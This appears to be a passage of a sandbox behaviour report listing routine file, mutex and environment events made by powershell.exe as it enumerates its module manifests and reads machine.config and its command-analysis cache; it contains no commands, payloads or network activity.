| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.WSMan.Management\Microsoft.WSMan.Management.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\MMAgent, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\MMAgent\MMAgent.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\MsDtc, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\MsDtc\MsDtc.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\NetAdapter, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\NetAdapter\NetAdapter.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\NetLbfo\NetLbfo.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\PrintManagement, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\PrintManagement\PrintManagement.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\PSDesiredStateConfiguration, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\PSDesiredStateConfiguration\PSDesiredStateConfiguration.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\PSDiagnostics, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\PSDiagnostics\PSDiagnostics.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\PSScheduledJob, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\PSScheduledJob\PSScheduledJob.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\PSWorkflow, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\PSWorkflow\PSWorkflow.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\PSWorkflowUtility, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\PSWorkflowUtility\PSWorkflowUtility.psd1, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1, type = file_type |
|
2 | |
| File | Read | filename = C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1, size = 4096, size_out = 1528 |
|
1 | |
| File | Read | filename = C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1, size = 520, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PackageManagement\PackageManagement.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PackageManagement\PackageManagement.psm1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PackageManagement\PackageManagement.cdxml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PackageManagement\PackageManagement.xaml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PackageManagement\PackageManagement.dll, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\3.3.5.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\3.3.5.psm1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\3.3.5.cdxml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\3.3.5.xaml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\3.3.5.dll, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\Pester, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\Pester.psd1, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\Pester.psd1, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\Pester.psd1, type = file_type |
|
2 | |
| File | Read | filename = C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\Pester.psd1, size = 4096, size_out = 4096 |
|
3 | |
| File | Read | filename = C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\Pester.psd1, size = 4096, size_out = 1509 |
|
1 | |
| File | Read | filename = C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\Pester.psd1, size = 539, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\Pester.psd1, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\Pester\Pester.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\Pester\Pester.psm1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\Pester\Pester.cdxml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\Pester\Pester.xaml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\Pester\Pester.dll, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\1.0.0.1.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\1.0.0.1.psm1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\1.0.0.1.cdxml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\1.0.0.1.xaml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\1.0.0.1.dll, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PowerShellGet, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1, type = file_type |
|
2 | |
| File | Read | filename = C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1, size = 4096, size_out = 4096 |
|
5 | |
| File | Read | filename = C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1, size = 4096, size_out = 2756 |
|
1 | |
| File | Read | filename = C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1, size = 316, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.psm1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.cdxml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.xaml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.dll, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\en, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\en\en.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\en\en.psm1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\en\en.cdxml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\en\en.xaml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\en\en.dll, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\1.1.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\1.1.psm1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\1.1.cdxml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\1.1.xaml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\1.1.dll, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PSReadline, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\PSReadline.psd1, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\PSReadline.psd1, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\PSReadline.psd1, type = file_type |
|
2 | |
| File | Read | filename = C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\PSReadline.psd1, size = 4096, size_out = 737 |
|
1 | |
| File | Read | filename = C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\PSReadline.psd1, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PSReadline\PSReadline.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PSReadline\PSReadline.psm1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PSReadline\PSReadline.cdxml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PSReadline\PSReadline.xaml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PSReadline\PSReadline.dll, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = PSDisableModuleAutoLoadingMemoryCache |
|
1 | |
| Mutex | Create | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-2172869166-1497266965-2109836178-1000 |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, type = file_type |
|
2 | |
| Module | Get Filename | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 260 |
|
1 | |
| File | Get Info | filename = C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config, type = file_attributes |
|
2 | |
| File | Create | filename = C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config, type = file_type |
|
2 | |
| File | Get Info | filename = C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config, type = size, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config, size = 4096, size_out = 4096 |
|
8 | |
| File | Read | filename = C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config, size = 4096, size_out = 3215 |
|
1 | |
| File | Read | filename = C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config, size = 4096, size_out = 0 |
|
1 | |
| Module | Get Filename | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 260 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe.config, type = file_attributes |
|
2 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 4096, size_out = 4096 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 43, size_out = 43 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 4096, size_out = 4096 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 9, size_out = 9 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 4096, size_out = 4096 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 11, size_out = 11 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 4096, size_out = 4096 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 4096, size_out = 3483 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 4096, size_out = 0 |
|
1 | |
| Environment | Get Environment String | name = PSDisableModuleAutoloadingCacheMaintenance |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ISE\ISE.psm1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\Pester.psm1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\Pester.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\PSReadLine.psm1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\PSReadline.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Security\Microsoft.PowerShell.Security.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.ODataUtils\Microsoft.PowerShell.ODataUtilsHelper.ps1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.ODataUtils\Microsoft.PowerShell.ODataUtils.psm1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.ODataUtils\Microsoft.PowerShell.ODataUtils.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management\Microsoft.PowerShell.Management.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Host\Microsoft.PowerShell.Host.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Diagnostics\Microsoft.PowerShell.Diagnostics.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Archive\Microsoft.PowerShell.Archive.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\AppBackgroundTask\AppBackgroundTask.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\AppLocker\AppLocker.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Appx\Appx.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\AssignedAccess\AssignedAccess.psm1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\AssignedAccess\AssignedAccess.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psm1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitsTransfer\BitsTransfer.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BranchCache\BranchCache.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\CimCmdlets\CimCmdlets.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender\Defender.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DirectAccessClientComponents\DirectAccessClientComponents.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Dism\Dism.psm1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Dism\Dism.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DnsClient\DnsClient.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\EventTracingManagement\EventTracingManagement.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\International\International.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\iSCSI\iSCSI.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Kds\Kds.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.WSMan.Management\Microsoft.WSMan.Management.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\MMAgent\MMAgent.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\MsDtc\MsDtc.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetAdapter\NetAdapter.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetConnection\NetConnection.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetEventPacketCapture\NetEventPacketCapture.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetLbfo\NetLbfo.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetNat\NetNat.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetQos\NetQos.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetSecurity\NetSecurity.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetSwitchTeam\NetSwitchTeam.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetTCPIP\NetTCPIP.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetworkConnectivityStatus\NetworkConnectivityStatus.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetworkSwitchManager\NetworkSwitchManager.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetworkTransition\NetworkTransition.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PcsvDevice\PcsvDevice.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PKI\PKI.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PnpDevice\PnpDevice.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PrintManagement\PrintManagement.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\PSDesiredStateConfiguration.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSDiagnostics\PSDiagnostics.psm1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSDiagnostics\PSDiagnostics.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSScheduledJob\PSScheduledJob.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSWorkflow\PSWorkflow.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSWorkflowUtility\PSWorkflowUtility.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ScheduledTasks\ScheduledTasks.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SecureBoot\SecureBoot.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbWitness\SmbWitness.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\StartLayout\StartLayout.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Storage\Storage.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\TLS\TLS.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\TroubleshootingPack\TroubleshootingPack.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\TrustedPlatformModule\TrustedPlatformModule.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\VpnClient\VpnClient.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Wdac\Wdac.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\WindowsDeveloperLicense\WindowsDeveloperLicense.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\WindowsErrorReporting.psm1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\WindowsErrorReporting.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\WindowsSearch\WindowsSearch.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\WindowsUpdate\WindowsUpdate.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ISE\ISE.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
